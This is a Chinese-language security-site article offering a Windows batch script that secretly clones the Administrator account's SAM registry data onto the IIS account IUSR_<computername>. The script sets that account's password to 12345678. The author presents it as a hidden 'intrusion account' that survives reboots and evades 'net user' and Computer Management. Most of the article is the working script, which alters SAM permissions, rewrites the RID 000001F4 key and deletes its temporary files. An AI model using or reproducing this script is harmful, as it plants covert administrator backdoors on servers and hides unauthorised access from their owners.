ARP联盟图文中心下载中心手机频道最近更新软件最近更新文章网络热点
您当前的位置→图文中心安全防范复制并隐藏administrator帐号(bat)
站内搜索:

复制并隐藏administrator帐号(bat)


2009/12/7  编辑:admin 来源:本站整理 

参考消息:http://www.arpun.com/网上看了很多复制administator权限帐号的方法或者工具,比如建立admin$,所谓的隐藏帐号,并复制administrator的权限。其实这是暂时、一次性隐藏而已,服务器重启一下通过“计算机管理”或者net user都能看到的。

本批处理根据服务器的情况,结合自己的研究,使用服务器本地iis帐号IUSR_计算机名,设置密码位12345678(可以自己改一下批处理最后一行)。这个来复制administrator权限,难以发现与引起怀疑。

(当然其他帐号也可以,用这个帐号主要通过机器名就能知道自己想要的入侵帐号密码是多少)

程序代码

echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find IUSR_%computername% 的对应id
for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export administrator register
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set TMP=%%j
set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
echo !TMP!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user IUSR_%computername% 12345678

更多精彩,请查看本类栏目: 安全防范
除非注明,ARP联盟文章来于网络,投稿原创等,转载请以链接形式标明本文地址。
本文地址:http://www.arpun.com/article/4661.html

相关文章
  • ·[图文]中国科学家说他们可以制作出复制人!
  • ·[图文]科学家也许发现了制造能够变出任何东西的复制器的方法
  • ·[图文]电脑不能复制粘贴如何解决
  • ·[图文]安卓手机怎么复制粘帖文字
  • ·[图文]手机搜狗输入法怎么复制粘贴
  • ·[图文]百度音乐怎么复制歌曲链接?
  • ·[图文]设置防止别人复制u盘中的文件的方法
  • ·[图文]复制文件到U盘时提示磁盘被写保护的修复方法
  • 发表评论
    栏目列表
    阅读排行
    本类最新
    网站帮助 - 广告合作 - 下载声明 - 网站地图